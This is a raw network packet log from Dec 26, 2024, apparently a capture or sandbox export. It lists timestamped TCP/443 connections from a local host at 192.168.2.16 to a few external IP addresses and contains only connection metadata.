Dec 26, 2024 18:26:23.790939093 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:23.791346073 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:23.791358948 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:25.098299980 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:25.098426104 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:25.099605083 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:25.099617958 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:25.099852085 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:25.101063013 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:25.101252079 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:25.101296902 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:25.101382971 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:25.101392031 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:26.071352005 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:26.071448088 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:26.071538925 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:26.071666956 CET	49712	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:26.071681976 CET	443	49712	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:26.139921904 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:26.139986992 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:26.140081882 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:26.140368938 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:26.140392065 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:27.450691938 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:27.450829029 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:27.451998949 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:27.452023983 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:27.452265978 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:27.453640938 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:27.453730106 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:27.453744888 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:28.215903044 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:28.216012955 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:28.216079950 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:28.216183901 CET	49713	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:28.216207027 CET	443	49713	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:28.221041918 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:28.221080065 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:28.221167088 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:28.221451044 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:28.221466064 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:29.931366920 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:29.931478024 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:29.932583094 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:29.932595968 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:29.932831049 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:29.933950901 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:29.934102058 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:29.934129953 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:30.699275017 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:30.699404955 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:30.699476004 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:30.699588060 CET	49714	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:30.699601889 CET	443	49714	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:30.784512043 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:30.784636021 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:30.784748077 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:30.785028934 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:30.785064936 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.091960907 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.092067957 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.093164921 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.093194008 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.093430042 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.094562054 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.094691038 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.094702959 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.899319887 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.899431944 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:32.899523020 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.899677038 CET	49715	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:32.899724960 CET	443	49715	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:33.005239964 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:33.005287886 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:33.005373955 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:33.005645990 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:33.005656004 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:34.310219049 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:34.310326099 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:34.311475039 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:34.311480999 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:34.311675072 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:34.312777996 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:34.312882900 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:34.312887907 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:35.124763012 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:35.124856949 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:35.124959946 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:35.125073910 CET	49716	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:35.125087023 CET	443	49716	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:35.127986908 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:35.128026962 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:35.128118992 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:35.128386021 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:35.128396034 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:36.436474085 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:36.436578989 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:36.437693119 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:36.437701941 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:36.437912941 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:36.439414978 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:36.439459085 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:36.439480066 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:37.202097893 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:37.202195883 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:37.202264071 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:37.202461958 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:37.202477932 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:37.202488899 CET	49717	443	192.168.2.16	172.67.166.49
Dec 26, 2024 18:26:37.202493906 CET	443	49717	172.67.166.49	192.168.2.16
Dec 26, 2024 18:26:37.696655989 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:37.696695089 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:37.696768999 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:37.697076082 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:37.697086096 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.388928890 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.389022112 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.390609026 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.390614986 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.390835047 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.392322063 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.439331055 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.921199083 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.921274900 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.921333075 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.921569109 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.921582937 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:39.921595097 CET	49718	443	192.168.2.16	185.161.251.21
Dec 26, 2024 18:26:39.921601057 CET	443	49718	185.161.251.21	192.168.2.16
Dec 26, 2024 18:26:40.263761044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:40.263789892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:40.263940096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:40.264292002 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:40.264303923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:41.577110052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:41.577183962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:41.578793049 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:41.578804016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:41.579044104 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:41.580275059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:41.623331070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220793962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220839977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220875025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220896006 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.220911980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220922947 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.220956087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.220968962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.221009016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.221014023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.229130983 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.229176044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.229195118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.237628937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.237683058 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.237704992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.284689903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.284698009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.332676888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.340612888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.380680084 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.430978060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.441174984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.441231012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.441240072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.448864937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.448914051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.448921919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.456695080 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.456753969 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.456760883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.464459896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.464505911 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.464513063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.472381115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.472428083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.472434998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.480083942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.480135918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.480143070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.486526012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.486579895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.486588001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.493366957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.493410110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.493417025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.499764919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.503212929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.503218889 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.505948067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.505990028 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.505995989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.556741953 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.556747913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.604676008 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.641894102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.645080090 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.645128012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.645138979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.650388956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.650439978 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.650446892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.655344963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.655390978 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.655399084 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.665298939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.665366888 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.665380955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.665433884 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.675471067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.675479889 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.675538063 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.680533886 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.680586100 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.685643911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.685651064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.685703039 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.695761919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.695770979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.695827007 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.705785036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.705797911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.705845118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.715922117 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.715992928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.721124887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.721226931 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.731225014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.731283903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.741344929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.741404057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.746460915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.746567965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.852333069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.852415085 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.858181953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.858256102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.862493992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.862551928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.870448112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.870515108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.877892971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.877959013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.885245085 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.885308027 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.889208078 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.889269114 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.896687031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.896745920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.900439024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.900501013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.907417059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.907478094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.914473057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.914530039 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.918102026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.918164015 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.925292969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.925350904 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.932280064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.932338953 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.939340115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.939399958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.942944050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.943003893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.950040102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.950098038 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.953690052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.953758001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.960781097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.960835934 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.967822075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.967879057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:42.974931002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:42.974989891 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.066720009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.066798925 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.067922115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.067976952 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.073040962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.073095083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.075695992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.075752020 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.081077099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.081136942 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.086064100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.086118937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.091445923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.091509104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.093985081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.094043970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.105909109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.105916977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.105956078 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.105982065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.105990887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.106023073 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.121087074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.121109009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.121151924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.121160030 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.121181965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.135934114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.135950089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.136015892 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.136025906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.150150061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.150166988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.150234938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.150245905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.165201902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.165221930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.165266037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.165277004 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.165316105 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.178224087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.178241014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.178307056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.178325891 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.226686001 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.279683113 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.279695988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.279738903 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.279761076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.279767036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.279786110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.279813051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.279840946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.287729025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.287744999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.287810087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.287825108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.287869930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.298703909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.298718929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.298788071 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.298799992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:43.298837900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:43.310378075 CET	443	49719	172.67.214.186	192.168.2.16
